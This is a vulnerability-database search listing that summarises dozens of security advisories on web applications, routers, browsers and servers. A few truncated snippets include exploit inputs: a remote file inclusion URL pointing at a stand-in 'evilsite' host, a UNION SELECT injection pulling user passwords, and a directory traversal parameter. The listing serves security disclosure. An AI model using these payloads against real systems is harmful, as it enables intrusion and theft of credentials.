Lucene search
K
SecurityvulnsMost viewed

47153 matches found

securityvulns
securityvulns
added 2013/04/08 12:0 a.m.107 views

[security bulletin] HPSBPV02855 SSRT100512 rev.1 - HP ProCurve 1700-8(J9079A) and 1700-24(J9080A) Switches, Cross Site Request Forgery (CSRF)

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Note: the current version of the following document is available here: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emrna-c03699981 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c03699981 Version: 1 HPSBPV02855...

6.8CVSS0.1AI score0.00968EPSS
Exploits0
securityvulns
securityvulns
added 2013/03/24 12:0 a.m.107 views

Apple Mac OS X multiple security vulnerabilities

Crossite scripting, authentication bypass, buffer overflows and memory corruptions in graphics libraries, information leakage, protection bypass, PDF parsing memory corruptions, different packages security vulnerabilities...

9.3CVSS4.5AI score0.99449EPSS
Exploits39References1Affected Software1
securityvulns
securityvulns
added 2013/03/03 12:0 a.m.107 views

Kayako Fusion v4.51.1891 - Multiple Web Vulnerabilities

Title: ====== Kayako Fusion v4.51.1891 - Multiple Web Vulnerabilities Date: ===== 2013-01-22 References: =========== http://www.vulnerability-lab.com/getcontent.php?id=824 ID: SWIFT-3119 URL: http://dev.kayako.com/browse/SWIFT-3119 VL-ID: ===== 824 Common Vulnerability Scoring System:...

7.1AI score
Exploits0
securityvulns
securityvulns
added 2013/02/24 12:0 a.m.107 views

[USN-1733-1] Ruby vulnerabilities

========================================================================== Ubuntu Security Notice USN-1733-1 February 21, 2013 ruby1.9.1 vulnerabilities ========================================================================== A security issue affects these releases of Ubuntu and its derivatives...

7.5CVSS0.7AI score0.13911EPSS
Exploits0
securityvulns
securityvulns
added 2012/10/22 12:0 a.m.107 views

Multiple vulnerabilities in Megapolis.Portal Manager

Hello 3APA3A! I want to warn you about multiple Cross-Site Scripting vulnerabilities in Megapolis.Portal Manager. It's commercial CMS from Softline-IT earlier Softline, which in particularly widespread among Ukrainian government sites including ministry, parliament, two special services and many...

0.6AI score
Exploits0
securityvulns
securityvulns
added 2012/04/19 12:0 a.m.107 views

VUPEN Security Research - Microsoft Internet Explorer VML Remote Code Execution (MS12-023 / CVE-2012-0172)

VUPEN Security Research - Microsoft Internet Explorer VML Remote Code Execution MS12-023 / CVE-2012-0172 Website : http://www.vupen.com/english/research.php Twitter : http://twitter.com/vupen I. BACKGROUND --------------------- "Microsoft Internet Explorer is a web browser developed by Microsoft...

9.3CVSS7AI score0.21897EPSS
Exploits1
securityvulns
securityvulns
added 2012/04/09 12:0 a.m.107 views

DirectAdmin v1.403 - Cross Site Scripting Vulnerability

Title: ====== DirectAdmin v1.403 - Cross Site Scripting Vulnerability Date: ===== 2012-04-02 References: =========== http://www.vulnerability-lab.com/getcontent.php?id=486 VL-ID: ===== 486 Introduction: ============= DirectAdmin is a graphical web-based web hosting control panel designed to make...

0.2AI score
Exploits0
securityvulns
securityvulns
added 2012/03/26 12:0 a.m.107 views

Seeker Advisory: Insecure Redirect in .NET Form Authentication - Redirect From Login Mechanism (ReturnURL Parameter)

Seeker Research Center Security Advisory By Irene Abezgauz =========== I. Overview =========== An Insecure Redirect vulnerability has been identified in the .NET Form Authentication - in the Redirect From Login mechanism. This vulnerability allows an attacker to craft links that contain redirects...

Exploits0
securityvulns
securityvulns
added 2012/01/21 12:0 a.m.107 views

ATutor 2.0.3 Multiple XSS vulnerabilities

Advisory: ATutor 2.0.3 Multiple XSS vulnerabilities Advisory ID: SSCHADV2012-002 Author: Stefan Schurtz Affected Software: Successfully tested on ATutor 2.0.3 Vendor URL: http://atutor.ca Vendor Status: informed ========================== Vulnerability Description ========================== ATuto...

6.1AI score
Exploits0
securityvulns
securityvulns
added 2011/11/27 12:0 a.m.107 views

[USN-1270-1] Software Center vulnerability

========================================================================== Ubuntu Security Notice USN-1270-1 November 21, 2011 software-center vulnerability ========================================================================== A security issue affects these releases of Ubuntu and its...

6.8CVSS0.9AI score0.01932EPSS
Exploits0
securityvulns
securityvulns
added 2011/11/27 12:0 a.m.107 views

Blogs manager <= 1.101 SQL Injection Vulnerability

Dear all, I have found a SQL injection vulnerability in Blogs manager = 1.101 It seems to be version 1.101 as you can see in the files section of sourceforge. I reported the vulnerability to the vendor but no response as stated in the advisory. Best, muuratsalo -- ADVISORY --...

Exploits0
securityvulns
securityvulns
added 2011/10/01 12:0 a.m.107 views

Mozilla Foundation Security Advisory 2011-39

Mozilla Foundation Security Advisory 2011-39 Title: Defense against multiple Location headers due to CRLF Injection Impact: Moderate Announced: September 27, 2011 Reporter: Ian Graham Products: Firefox, Thunderbird, SeaMonkey Fixed in: Firefox 7.0 Firefox 3.6.23 Thunderbird 7.0 SeaMonkey 2.4...

4.3CVSS1AI score0.02018EPSS
Exploits0
securityvulns
securityvulns
added 2011/08/05 12:0 a.m.107 views

Cross Site Scription Vulnerability in vBulletin 4.1.3, 4.1.4 and 4.1.5

Advisory Information Title: vBulletin Cross Site Scripting Vulnerability Vendors contacted: vBulletin team ---- Vulnerability Information Class: XSS flaw Vulnerable page: Admin Login Page admincp Remotely Exploitable: Yes ---- Vulnerability Description vBulletin is a community forum solution for ...

5.8AI score
Exploits0
securityvulns
securityvulns
added 2011/08/03 12:0 a.m.107 views

Cisco Security Advisory: Cisco TelePresence Recording Server Default Credentials for Root Account Vulnerability

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 Cisco Security Advisory: Cisco TelePresence Recording Server Default Credentials for Root Account Vulnerability Advisory ID: cisco-sa-20110729-tp Revision 1.0 For Public Release 2011 July 29 1600 UTC GMT...

10CVSS0.3AI score0.03366EPSS
Exploits0
securityvulns
securityvulns
added 2011/06/15 12:0 a.m.107 views

phion netfence / Barracuda NG Firewall: Remote Command Execution with root Privileges

Security Advisory --------------------------------------- Vulnerable Software: Barracuda NG Firewall / phion netfence Homepage: http://www.barracudanetworks.com/ Found by: Wolfgang Neudorfer, Lukas Nothdurfter Impact: Remote Command Execution with root Privileges Severity: Critical Product...

0.9AI score
Exploits0
securityvulns
securityvulns
added 2011/01/03 12:0 a.m.107 views

Chilkat Software FTP2 ActiveX Component (ChilkatFtp2.DLL 2.6.1.1) Remote Code Execution poc

!-- Chilkat Software FTP2 ActiveX Component ChilkatFtp2.DLL 2.6.1.1 Remote Code Execution poc by rgod tested against Internet Explorer 7 on Vista should also work with 8/9 ActiveX Settings: CLSID: 302124C4-30A0-484A-9C7A-B51D5BA5306B Progid: ChilkatFtp2.ChilkatFtp2.1 Binary Path:...

0.6AI score
Exploits0
securityvulns
securityvulns
added 2010/06/08 12:0 a.m.107 views

Microsoft Security Bulletin MS10-034 - Critical Cumulative Security Update of ActiveX Kill Bits (980195)

Microsoft Security Bulletin MS10-034 - Critical Cumulative Security Update of ActiveX Kill Bits 980195 Published: June 08, 2010 Version: 1.0 General Information Executive Summary This security update addresses two privately reported vulnerabilities for Microsoft software. This security update is...

9.3CVSS0.2AI score0.28762EPSS
Exploits3
securityvulns
securityvulns
added 2010/06/07 12:0 a.m.107 views

SQL injection vulnerability in CuteSITE CMS

Vulnerability ID: HTB22396 Reference: http://www.htbridge.ch/advisory/sqlinjectionvulnerabilityincutesitecms.html Product: CuteSITE CMS Vendor: AMT Company Vulnerable Version: 1.5.0 and Probably Prior Versions Vendor Notification: 20 May 2010 Vulnerability Type: SQL Injection Status: Not Fixed,...

0.9AI score
Exploits0
securityvulns
securityvulns
added 2010/04/07 12:0 a.m.107 views

[SECURITY] [DSA 2030-1] New mahara packages fix sql injection

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - -------------------------------------------------------------------------- Debian Security Advisory DSA-2030-1 [email protected] http://www.debian.org/security/ Nico Golde April 6th, 2010 http://www.debian.org/security/faq -...

7.5CVSS6.1AI score0.01717EPSS
Exploits0
securityvulns
securityvulns
added 2009/11/30 12:0 a.m.107 views

TLS / SSLv3 vulnerability explained (New ways to leverage the vulnerability)

Dear List, I updated the whitepaper with a lot of new information, some leveraging the vulnerability in other ways that certainly increase the effectiveness and impact of this vulnerability. A brief warning to those that think they are safe because they don't accept client-side renegotiations...

0.2AI score
Exploits0
securityvulns
securityvulns
added 2009/07/12 12:0 a.m.107 views

Atlantic SimpleCaddy Shopping Cart Price Manipulation

SENKED-2009-0001 - Atlantic SimpleCaddy Shopping Cart Price Manipulation senked security advisory http://www.senked.com/ Date Published: 2009-07-01 Last Update: 2009-07-01 Advisory ID: SENKED-2009-0001 Bugtraq ID: none CVE Name: none Title: Atlanticintelligence SimpleCaddy Shoopuing Cart Price...

0.1AI score
Exploits0
securityvulns
securityvulns
added 2009/06/25 12:0 a.m.107 views

[USN-791-3] Smarty vulnerability

=========================================================== Ubuntu Security Notice USN-791-3 June 24, 2009 smarty vulnerability CVE-2009-1669 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 9.04 This advisory also applies ...

10CVSS1AI score0.14117EPSS
Exploits1
securityvulns
securityvulns
added 2009/05/25 12:0 a.m.107 views

LxBlog

Securitylab.ir Application Info: Name: LxBlog Website: http://www.lxblog.net Discoverd By: Securitylab.ir Website: http://securitylab.ir Contacts: adminatsecuritylab.ir & info@securitylabdotir Vulnerability Info: Type: Sql/Xss Risk: Medium =========================================================...

7.1AI score
Exploits0
securityvulns
securityvulns
added 2009/02/26 12:0 a.m.107 views

Cisco Unified MeetingPlace Web Conferencing Stored Cross Site Scripting Vulnerability

Title: Cisco Unified MeetingPlace Web Conferencing Stored Cross Site Scripting Vulnerability CVE Identifier: N/A Credit: Security Assurance Team of the National Australia Bank. The vendor was advised of this vulnerability prior to its public release. National Australia Bank adheres to the...

6AI score
Exploits0
securityvulns
securityvulns
added 2008/03/28 12:0 a.m.107 views

US-CERT Technical Cyber Security Alert TA08-087A -- Mozilla Updates for Multiple Vulnerabilities

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 National Cyber Alert System Technical Cyber Security Alert TA08-087A Mozilla Updates for Multiple Vulnerabilities Original release date: March 27, 2008 Last revised: -- Source: US-CERT Systems Affected Mozilla Firefox Mozilla Thunderbird Mozilla...

0.5AI score
Exploits0
securityvulns
securityvulns
added 2008/02/16 12:0 a.m.107 views

UniversalFtp Server 1.0.44 Multiple Remote Denial of service

UniversalFtp Server 1.0.44 Multiple Remote Denial of service @nolife : This bug has been found with a brain , ten fingers, a keyboard , and a laptop , one of my best Tool i ever tryed. Stay tuned for more tools hint . Reponse: 226 Completed... Statut: Liste du repertoire completee Commande : LIST...

1.2AI score
Exploits0
securityvulns
securityvulns
added 2008/02/10 12:0 a.m.107 views

Mozilla Foundation Security Advisory 2008-05

Mozilla Foundation Security Advisory 2008-05 Title: Directory traversal via chrome: URI Impact: High Announced: February 7, 2008 Reporter: Gerry Eisenhaur Products: Firefox, Thunderbird, SeaMonkey Fixed in: Firefox 2.0.0.12 Thunderbird 2.0.0.12 SeaMonkey 1.1.8 Description Gerry Eisenhaur reported...

4.3CVSS2.3AI score0.08633EPSS
Exploits0
securityvulns
securityvulns
added 2007/12/20 12:0 a.m.107 views

xeCMS 1.x.x Remote File Disclosure Vulnerability.

-------------------------------------------------------------- xeCMS 1.x.x Remote File Disclosure Vulnerability. -------------------------------------------------------------- download : http://xecms.sunsite.dk/ author : p4imi0 contact : [email protected] exploit : view.php?list=..2F..2F...

0.6AI score
Exploits0
securityvulns
securityvulns
added 2007/11/27 12:0 a.m.107 views

FMDeluxe (index.php) Cross-Site Scripting Vulnerability

FMDeluxe index.php Cross-Site Scripting Vulnerability Download: http://fmdeluxe.com/ Bug found by Jose Luis Gуngora Fernбndez / JosS Contact: sys-projectathotmail.com Spanish Hackers Team www.spanish-hackers.com /server irc.freenode.net /join fullsecure d0rk: "Powered By FMDeluxe" Stop lammer...

1AI score
Exploits0
securityvulns
securityvulns
added 2007/10/10 12:0 a.m.107 views

rPSA-2007-0212-1 util-linux

rPath Security Advisory: 2007-0212-1 Published: 2007-10-08 Products: rPath Linux 1 Rating: Major Exposure Level Classification: Local Root Deterministic Privilege Escalation Updated Versions: util-linux=/conary.rpath.com@rpl:devel//1/2.12r-1.5-1 rPath Issue Tracking System:...

6.9CVSS6.2AI score0.0044EPSS
Exploits0
securityvulns
securityvulns
added 2007/05/14 12:0 a.m.107 views

Webspeed OpenEdge Dos exploit

Webspeed OpenEdge Dos exploit Bug Discovered By :Eelko Neven Exploit Coded By spyMASter eklimizide koyalm : www.ulpow.net The Eliminators of the Web First you have to find the messenger execution url. For example: http://target/scripts/cgiip.exe/WService=wsbroker1...

0.4AI score
Exploits0
securityvulns
securityvulns
added 2007/04/24 12:0 a.m.107 views

Big Blue Guestbook HTML Injection Vulnerabilities

Hi friends, Big Blue Guestbook software is prone to HTML injection attacks. This issue is exposed via the message form field in the guestbook entry submission form. Exploitation could permit remote attackers to persistently inject hostile HTML and script code into guestbook content. This could...

0.8AI score
Exploits0
securityvulns
securityvulns
added 2007/01/25 12:0 a.m.107 views

Oracle Buffer Overflow in DBMS_DRS.GET_PROPERTY

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Oracle Database Buffer overflow vulnerabilities in procedure DBMSDRS.GETPROPERTY DB03 AppSecInc Team SHATTER Security Advisory http://www.appsecinc.com/resources/alerts/oracle Jan 18, 2007 Affected versions: Oracle Database Server versions 9iR2 and...

1.2AI score
Exploits0
securityvulns
securityvulns
added 2006/11/22 12:0 a.m.107 views

Ixprim CMS 1.2 Remote File Include Vulnerability

Aplication : Ixprim CMS 1.2 URL :http://optusnet.dl.sourceforge.net/sourceforge/ixprim/ixprim-1.2-200603171800.zip variable ixpts.class.php includeonce IXPROOTPATH.'/kernel/class/files.class.php' ; Exploit : http://www.vuln.com/kernel/class/ixpts.class.php?IXPROOTPATH=http://evilsite vitux...

1.1AI score
Exploits0
securityvulns
securityvulns
added 2006/09/14 12:0 a.m.107 views

TualBLOG v 1.0 multiple sql injection

BiyoSecurity.Org script name : TualBLOG v 1.0 Risk : High Regards : Dj ReMix Thanks : Korsan , Liz0zim Vulnerable file : icerik.asp exp : http://site.com/path/icerik.asp?icerikno=-120union+select+mail,sifre,uyeadi+from+tbluye+where+uyeno=1 uyeno = 1 or 2 Admin ID Bye :=...

0.5AI score
Exploits0
securityvulns
securityvulns
added 2006/09/13 12:0 a.m.107 views

WTools v0.0.1-ALPH - Remote File Include Vulnerabilities

ERNE ---- ERNEALiZM ---- BU ASK BiTMEZ---- WTools v0.0.1-ALPH - Remote File Include Vulnerabilities site : http://www.comscripts.com/jump.php?action=script&id=1880 Script : WTools v0.0.1-ALPH Credits : ERNE Contact : [email protected] and irc.gigachat.net kurdhack Thanks : BLaCKWHITE, Blackened,...

0.7AI score
Exploits0
securityvulns
securityvulns
added 2006/09/04 12:0 a.m.107 views

yappa-ng <= v2.3.1 (admin_modules) Remote File Inclusion Exploit

============================================================================================== yappa-ng = v2.3.1 adminmodules Remote File Inclusion Exploit =============================================================================================== Critical Level : Dangerous Venedor site :...

1.4AI score
Exploits0
securityvulns
securityvulns
added 2006/06/14 12:0 a.m.107 views

Windows ICMP DoS (potential code execution)

Buffer overflow on ICMP packets with Loose Source and Record Route IP options. Short message translation: There are DoS conditions in Windows 2000 built-in NAT server. Tested configuration: Windows 2000 English Standard/Advanced Service Pack 4 + Update Rollup 1 for Service Pack 4 with NAT server...

1.7AI score
Exploits0References3
securityvulns
securityvulns
added 2006/01/31 12:0 a.m.107 views

NetDSL-1000 DSL router telnet server DoS

Request flood causes telnet service to hang...

1.9AI score
Exploits0
securityvulns
securityvulns
added 2005/02/08 12:0 a.m.107 views

Foxmail Server Remote Buffer Overflow Vulnerability

DATE: 02/04/2005 AUTHOR: Fortinet, inc xouyangxouyangatfortinet.com [email protected] PRODUCTS: Foxmail Server- A MAil server for both Windows and linux. AFFECTED VERSION: Foxmail server for windows version 2.0Newest.I just test windows server ,maybe linux version have vulnerability too...

0.4AI score
Exploits0
securityvulns
securityvulns
added 2004/10/27 12:0 a.m.107 views

MailCarrier 2.51 SMTP server Buffer Overflow [PoC included]

ABOUT : MailCarrier is a full-featured mail server with the latest security and anti-spam functions. It supports SSL communication and SMTP/POP3 authentication methods based on SASL and NTLM that do not transmit message and/or password in clear text. Many spam mails can be blocked through inquiry...

0.2AI score
Exploits0
securityvulns
securityvulns
added 2003/12/17 12:0 a.m.107 views

J2EE 1.4 reference implementation: database component allows remote code execution

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Illegalaccess.org security advisory i/12-2003 www.illegalaccess.org J2EE 1.4 reference implementation: database component allows remote code execution Brief ===== Product : J2EE reference implementation java.sun.com/j2ee/download.html Component :...

8.9AI score
Exploits0
securityvulns
securityvulns
added 2003/05/29 12:0 a.m.107 views

[SECURITY] [ANNOUNCE] Apache 2.0.46 released

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Apache 2.0.46 Released The Apache Software Foundation and the Apache HTTP Server Project are pleased to announce the ninth public release of the Apache 2.0 HTTP Server. This Announcement notes the significant changes in 2.0.46 as compared to 2.0.45...

5CVSS7.5AI score0.63456EPSS
Exploits0
securityvulns
securityvulns
added 2001/03/01 12:0 a.m.107 views

Vulnerability in TYPSoft FTP Server

----- Begin Hush Signed Message from [email protected] ----- Vulnerability in TYPSoft FTP Server Overview TYPSoft FTP Server v0.85 is an ftp server available from http://www.webmasterfree.com and http://typsoft.n3.net. A vulnerability exists which allows a remote attacker to break out of the...

7.3AI score
Exploits0
securityvulns
securityvulns
added 2000/10/19 12:0 a.m.107 views

Security Bulletin (MS00-079)

Microsoft Security Bulletin MS00-079 - - -------------------------------------- Patch Available for "HyperTerminal Buffer Overflow" Vulnerability Originally posted: October 18, 2000 Summary ======= Microsoft has released a patch that eliminates a security vulnerability in the HyperTerminal...

7.4AI score
Exploits0
securityvulns
securityvulns
added 2015/10/26 12:0 a.m.106 views

[CVE-2015-5956] Typo3 Core sanitizeLocalUrl() Non-Persistent Cross-Site Scripting

secunet Security Networks AG Security Advisory Advisory: Typo3 Core sanitizeLocalUrl Non-Persistent Cross-Site Scripting 1. DETAILS ---------- Product: Typo3 CMS Vendor URL: typo3.org Type: Cross-site ScriptingCWE-79 Date found: 2015-07-30 Date published: 2015-09-14 CVSSv2 Score: 3,5...

3.5CVSS0.1AI score0.02006EPSS
Exploits3
securityvulns
securityvulns
added 2015/10/26 12:0 a.m.106 views

TestLink Security Advisory - SQL Injection Vulnerability - CVE-2015-7390

Information -------------------- Advisory by Netsparker. Name: SQL Injection Vulnerability in TestLink 1.9.13 Affected Software : TestLink Affected Versions: 1.9.1.3 and possibly below Vendor Homepage : http://testlink.org/ Vulnerability Type : SQL Injection Severity : Critical Status : Fixed...

7.5CVSS10AI score0.01589EPSS
Exploits2
securityvulns
securityvulns
added 2015/08/24 12:0 a.m.106 views

UDID+ v2.5 iOS - Mail Command Inject Vulnerability

Document Title: =============== UDID+ v2.5 iOS - Mail Command Inject Vulnerability References Source: ==================== http://www.vulnerability-lab.com/getcontent.php?id=1542 Release Date: ============= 2015-07-06 Vulnerability Laboratory ID VL-ID: ==================================== 1542...

0.3AI score
Exploits0
securityvulns
securityvulns
added 2015/06/08 12:0 a.m.106 views

Freebox OS Web interface 3.0.2 XSS, CSRF

Hello list, Here are two CVEs I reported to Freebox, a french ISP: - CVE-2014-9382 - CSRF in VPN user account creation - CVE-2014-9405 - XSS Vulnerable product: Freebox OS Web interface 3.0.2. CVE-2014-9382 - CSRF in Freebox OS Web interface 3.0.2 allowing VPN user account creation...

5.6AI score0.01505EPSS
Exploits3
securityvulns
securityvulns
added 2015/05/12 12:0 a.m.106 views

WSO2 Identity Server multiple vulnerabilities

Hi, WSO2 Identity Server http://wso2.com/products/identity-server/ version 4.5.0/4.6.0/5.0.0 is prone to multiple vulnerabilities, including authentication bypass. Timeline: 09.10.2014 - Vendor notified 22.11.2014 - Vendor confirmed 04.12.2014 - Patches released 25.03.2015 - Bugtraq disclosure...

0.2AI score
Exploits0
Total number of security vulnerabilities5000